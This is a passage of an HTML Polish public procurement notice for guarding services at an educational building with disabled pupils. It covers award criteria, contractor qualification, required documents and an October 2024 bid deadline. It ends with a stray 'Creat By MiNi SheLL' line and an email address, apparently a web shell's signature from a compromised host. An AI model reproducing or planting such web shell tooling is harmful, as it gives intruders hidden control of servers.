wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielanie zamówień, o których mowa w art. 214 ust. 1 pkt 7 Pzp.<br/>Wartość zamówienia o którym mowa w art. 214 ust. 1 pkt 7 Pzp przewiduje się w wysokości 20% zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób wyznaczonych do realizacji zamówienia w ochronie obiektów edukacyjnych z uczniami niepełnosprawnymi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy prowadzący działalność gospodarczą wpisani do właściwego rejestru przedsiębiorców. <br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający uzna, że Wykonawca spełnia warunek dotyczący uprawnień do prowadzenia określonej działalności zawodowej, jeżeli złoży:<br/>a) koncesję ministra właściwego do spraw wewnętrznych wydaną na podstawie ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (t.j. Dz. U. z 2021 r. poz. 1995) na prowadzenie działalności gospodarczej w zakresie świadczenia usług związanych z ochroną obiektów, osób i mienia (Czas, na jaki udzielono koncesji nie może być krótszy niż okres realizacji przedmiotowego zamówienia); <br/>Warunek zostanie uznany za spełniony jeżeli Wykonawca lub członek konsorcjum lub podmiot, na którego zasoby powołuje się Wykonawca spełni go samodzielnie.<br/>Ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą „spełnia/nie spełnia”.<br/><br/>3)	sytuacji ekonomicznej lub finansowej: <br/>a) Znajdują się w sytuacji ekonomicznej lub finansowej zapewniającej bezpieczną realizację zamówienia w całym jego okresie.<br/>b) Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 2.000.000,00 zł. <br/>Warunek zostanie uznany za spełniony jeżeli Wykonawca lub członek konsorcjum lub podmiot, na którego zasoby powołuje się Wykonawca spełnią go wspólnie.<br/>Ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą „spełnia/nie spełnia”.<br/>Podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie z wykonawcą, który polega na jego sytuacji finansowej lub ekonomicznej, za szkodę poniesioną przez zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów podmiot nie ponosi winy.<br/><br/>4)	zdolności technicznej lub zawodowej:<br/>a) w zakresie doświadczenia:<br/>Zamawiający uzna, że Wykonawca spełnia warunek dotyczący doświadczenia, jeżeli wykaże w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, że zrealizował co najmniej 2 zamówienia obejmujące usługi ochrony mienia w budynkach użyteczności publicznej, w tym jedno w obiekcie edukacyjnym z uczniami niepełnosprawnymi, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi te zostały wykonane lub są wykonywane oraz załączeniem dowodów, czy usługi te zostały wykonane lub są wykonywane należycie wraz z załączeniem dowodów tj. referencji lub innych dokumentów sporządzonych przez podmiot, na rzecz którego usługi zostały wykonane lub są wykonywane, potwierdzające czy usługi te zostały wykonane lub są wykonywane należycie w odniesieniu do usług nadal wykonywanych ww. poświadczenia powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać ww. poświadczeń - oświadczenie Wykonawcy.<br/>Warunek zostanie uznany za spełniony jeżeli Wykonawca lub członek konsorcjum lub podmiot, na którego zasoby powołuje się Wykonawca spełni go samodzielnie (doświadczenia zawodowego się nie sumuje).<br/>Ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą „spełnia/nie spełnia”.<br/>Wykaz ww. usług zostanie sporządzony przez Wykonawcę na formularzu zgodnym z treścią załącznika nr 5 do SWZ <br/><br/>b) osób skierowanych przez Wykonawcę do realizacji zamówienia:<br/>Wykonawca spełni warunek, jeżeli wykaże, że dysponuje minimum 3 osobami wykonującymi zadania ochrony (warunek spełnią osoby wpisane na listę kwalifikowanych pracowników ochrony, jak również osoby niewymagające wpisu na tą listę) w rozumieniu ustawy z dnia 22 sierpnia 1997 roku o ochronie osób i mienia (t.j. Dz. U. z 2021 r. poz. 1995), w tym minimum 2 osobami posiadającymi co najmniej roczne doświadczenie zawodowe każda w ochronie obiektów edukacyjnych z uczniami niepełnosprawnymi oraz 1 osobą zatrudnioną na podstawie stosunku pracy do czynności nadzoru.<br/>Warunek zostanie uznany za spełniony jeżeli Wykonawca lub członek konsorcjum lub podmiot, na którego zasoby powołuje się Wykonawca spełni go samodzielnie.<br/>Ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą „spełnia/nie spełnia”.<br/>3.	Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej - dopuszcza łączne spełnianie warunku przez Wykonawców.<br/>4.	Zamawiający może na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o braku podstaw do wykluczenia z postępowania zgodnie z Załącznikiem nr 2 do SWZ;<br/>2. Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:<br/>1) Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2024 r. poz. 594), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej - załącznik nr 4 do SWZ;<br/>2) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z Załącznikiem nr 2 do SWZ;<br/>2. Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:<br/>1) koncesję, zezwolenie, licencję lub dokument potwierdzający, że wykonawca jest wpisany do jednego z rejestrów zawodowych lub handlowych, prowadzonych w państwie członkowskim Unii Europejskiej, w którym wykonawca ma siedzibę lub miejsce zamieszkania:<br/>- koncesję ministra właściwego do spraw wewnętrznych wydaną na podstawie ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (t.j. Dz. U. z 2021 r. poz. 1995) na prowadzenie działalności gospodarczej w zakresie świadczenia usług związanych z ochroną obiektów, osób i mienia (Czas, na jaki udzielono koncesji nie może być krótszy niż okres realizacji przedmiotowego zamówienia)<br/>2) dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez zamawiającego.<br/>3) Wykaz usług porównywalnych z usługami stanowiącymi przedmiot zamówienia, wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane w okresie ostatnich 3 miesięcy - załącznik nr 5 do SWZ;<br/>4) Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień i doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – załącznik nr 6 do SWZ;</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) zobowiązanie innego podmiotu, o którym mowa w Rozdziale XI ust. 3 SWZ (jeżeli dotyczy);<br/>2) dokumenty, z których wynika prawo do podpisania oferty; odpowiednie pełnomocnictwa (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 Pzp oraz wskazanym we Wzorze Umowy, stanowiącym Załącznik nr 7 do SWZ.<br/>2. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-10-10 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć poprzez Platformę e-zamówienia: https://ezamowienia.gov.pl/pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-10-10 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com